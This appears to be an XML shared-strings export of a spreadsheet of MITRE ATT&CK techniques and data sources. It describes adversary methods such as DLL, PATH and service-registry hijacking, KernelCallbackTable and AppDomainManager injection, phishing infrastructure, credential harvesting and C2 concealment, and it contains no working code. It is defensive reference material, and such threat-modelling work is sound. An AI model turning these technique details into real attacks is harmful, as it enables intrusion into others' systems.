    <t>T1574</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence, Privilege Escalation</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</si>
  <si>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</si>
  <si>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Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. 
Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.
For example, on Windows if an adversary places a malicious program named "net.exe" in `C:\example path`, which by default precedes `C:\Windows\system32\net.exe` in the PATH environment variable, when "net" is executed from the command-line the `C:\example path` will be called instead of the system's legitimate executable at `C:\Windows\system32\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)
Adversaries may also directly modify the $PATH variable specifying the directories to be searched.  An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.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user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the &lt;code&gt;FailureCommand&lt;/code&gt; key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The &lt;code&gt;Performance&lt;/code&gt; key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the &lt;code&gt;Performance&lt;/code&gt; key is not already present and if an adversary-controlled user has the &lt;code&gt;Create Subkey&lt;/code&gt; permission, adversaries may create the &lt;code&gt;Performance&lt;/code&gt; key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the &lt;code&gt;Parameters&lt;/code&gt; key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;.(Citation: malware_hides_service)</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</si>
  <si>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</si>
  <si>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Adversaries may abuse the &lt;code&gt;KernelCallbackTable&lt;/code&gt; of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once &lt;code&gt;user32.dll&lt;/code&gt; is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the &lt;code&gt;KernelCallbackTable&lt;/code&gt; by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be obtained by locating the PEB (ex: via a call to the &lt;code&gt;NtQueryInformationProcess()&lt;/code&gt; [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; can be duplicated, and a function in the table (e.g., &lt;code&gt;fnCOPYDATA&lt;/code&gt;) set to the address of a malicious payload (ex: via &lt;code&gt;WriteProcessMemory()&lt;/code&gt;). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the &lt;code&gt;KernelCallbackTable&lt;/code&gt; may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the &lt;code&gt;KernelCallbackTable&lt;/code&gt; to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) 
Known as "AppDomainManager injection," adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)</t>
  </si>
  <si>
    <t>T1578</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1580</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin)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</si>
  <si>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Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)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
In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked)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</si>
  <si>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</si>
  <si>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Internet Scan: Response Content</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</si>
  <si>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noise.(Citation: FireEye APT29) By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>Adversaries may purchase and configure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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices,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</si>
  <si>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taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022)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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may compromise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t>
  </si>
  <si>
    <t>Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.
Once an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices.
Adversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
Compromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t xml:space="preserve">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 In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)
</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)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 </t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1586</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024)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t>
  </si>
  <si>
    <t>T1587</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Malware Repository: Malware Metadata</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)
</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.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 or permitted MFA /methods associated with those usernames.(Citation: GrimBlog UsernameEnum)(Citation: Obsidian SSPR Abuse 2023)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</si>
  <si>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 xml:space="preserve">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(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)
Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.). Adversaries may purchase credentials from dark web markets, such as Russian Market and 2easy, or through access to Telegram channels that distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer Stealer Logs 2023)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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1590</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1591</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1592</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</si>
  <si>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Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1593</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>T1594</t>
  </si>
  <si>
    <t xml:space="preserve">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
In addition to manually browsing the website, adversaries may attempt to identify hidden directories or files that could contain additional sensitive information or vulnerable functionality. They may do this through automated activities such as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as well as by leveraging files such as sitemap.xml and robots.txt.(Citation: Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) </t>
  </si>
  <si>
    <t>T1595</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>T1596</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1597</t>
  </si>
  <si>
    <t>Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1598</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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embed “tracking pixels”, "web bugs", or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP)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perform adversary-in-the-middle phishing by proxying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Adversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly  to a user’s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form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</si>
  <si>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t>
  </si>
  <si>
    <t>T1599</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1600</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1601</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1602</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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Entra ID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</si>
  <si>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T1608</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Links can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)
Adversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)</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</si>
  <si>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In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)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t>
  </si>
  <si>
    <t>T1609</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</si>
  <si>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</si>
  <si>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T1610</t>
  </si>
  <si>
    <t>Defense Evasion, Execution</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</si>
  <si>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In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
Containers can be deployed by various means, such as via Docker's &lt;code&gt;create&lt;/code&gt; and &lt;code&gt;start&lt;/code&gt; APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)</t>
  </si>
  <si>
    <t>T1611</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</si>
  <si>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accessing other containers running on the host, or setting up a command and control channel on the host.</t>
  </si>
  <si>
    <t>T1612</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</si>
  <si>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</si>
  <si>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T1613</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</si>
  <si>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</si>
  <si>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T1614</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1615</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</si>
  <si>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or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.</t>
  </si>
  <si>
    <t>T1619</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1620</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</si>
  <si>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(e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).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For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)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</si>
  <si>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T1621</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</si>
  <si>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If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)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t>
  </si>
  <si>
    <t>T1622</t>
  </si>
  <si>
    <t>Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
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
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
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t>
  </si>
  <si>
    <t>T1647</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1648</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</si>
  <si>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This is also possible in many cloud-based office application suites. For example, in Microsoft 365 environments, an adversary may create a Power Automate workflow that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace environments, they may instead create an Apps Script that exfiltrates a user's data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation: OWN-CERT Google App Script 2024)</t>
  </si>
  <si>
    <t>T1649</t>
  </si>
  <si>
    <t>Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID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t>
  </si>
  <si>
    <t>T1650</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1651</t>
  </si>
  <si>
    <t>Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>T1652</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1653</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1654</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</si>
  <si>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
In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)</t>
  </si>
  <si>
    <t>T1656</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1657</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</si>
  <si>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to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)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t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Command and Control, Initial Access</t>
  </si>
  <si>
    <t>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
Adversaries may inject content to victim systems in various ways, including:
*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
* From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)
Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.
C2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)
Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)
Hiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)</t>
  </si>
  <si>
    <t>T1666</t>
  </si>
  <si>
    <t>Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  
IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)
Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)
In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)</t>
  </si>
  <si>
    <t>Data Source</t>
  </si>
  <si>
    <t>Available</t>
  </si>
  <si>
    <t>Note</t>
  </si>
  <si>
    <t>collection layers</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>Active Directory</t>
  </si>
  <si>
    <t>DS0026</t>
  </si>
  <si>
    <t>Cloud Control Plane, Host</t>
  </si>
  <si>
    <t>datasource</t>
  </si>
  <si>
    <t>A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)</t>
  </si>
  <si>
    <t>datacomponent</t>
  </si>
  <si>
    <t>A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access</t>
  </si>
  <si>
    <t>Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation</t>
  </si>
  <si>
    <t>Initial construction of a new active directory object (ex: Windows EID 5137)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Deletion</t>
  </si>
  <si>
    <t>Removal of an active directory object (ex: Windows EID 5141)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification</t>
  </si>
  <si>
    <t>Changes made to an active directory object (ex: Windows EID 5163 or 5136)</t>
  </si>
  <si>
    <t>Application Log</t>
  </si>
  <si>
    <t>DS0015</t>
  </si>
  <si>
    <t>Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)</t>
  </si>
  <si>
    <t>Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)</t>
  </si>
  <si>
    <t>Certificate</t>
  </si>
  <si>
    <t>DS0037</t>
  </si>
  <si>
    <t>OSINT</t>
  </si>
  <si>
    <t>A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration</t>
  </si>
  <si>
    <t>Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency)</t>
  </si>
  <si>
    <t>Cloud Service</t>
  </si>
  <si>
    <t>DS0025</t>
  </si>
  <si>
    <t>Cloud Control Plane</t>
  </si>
  <si>
    <t>Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products)</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable</t>
  </si>
  <si>
    <t>Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging)</t>
  </si>
  <si>
    <t>An extracted list of cloud services (ex: AWS ECS ListServices)</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Metadata</t>
  </si>
  <si>
    <t>Contextual data about a cloud service and activity around it such as name, type, or purpose/function</t>
  </si>
  <si>
    <t>Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule)</t>
  </si>
  <si>
    <t>Cloud Storage</t>
  </si>
  <si>
    <t>DS0010</t>
  </si>
  <si>
    <t>Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access</t>
  </si>
  <si>
    <t>Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject)</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation</t>
  </si>
  <si>
    <t>Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket)</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion</t>
  </si>
  <si>
    <t>Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket)</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration</t>
  </si>
  <si>
    <t>An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects)</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Metadata</t>
  </si>
  <si>
    <t>Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner</t>
  </si>
  <si>
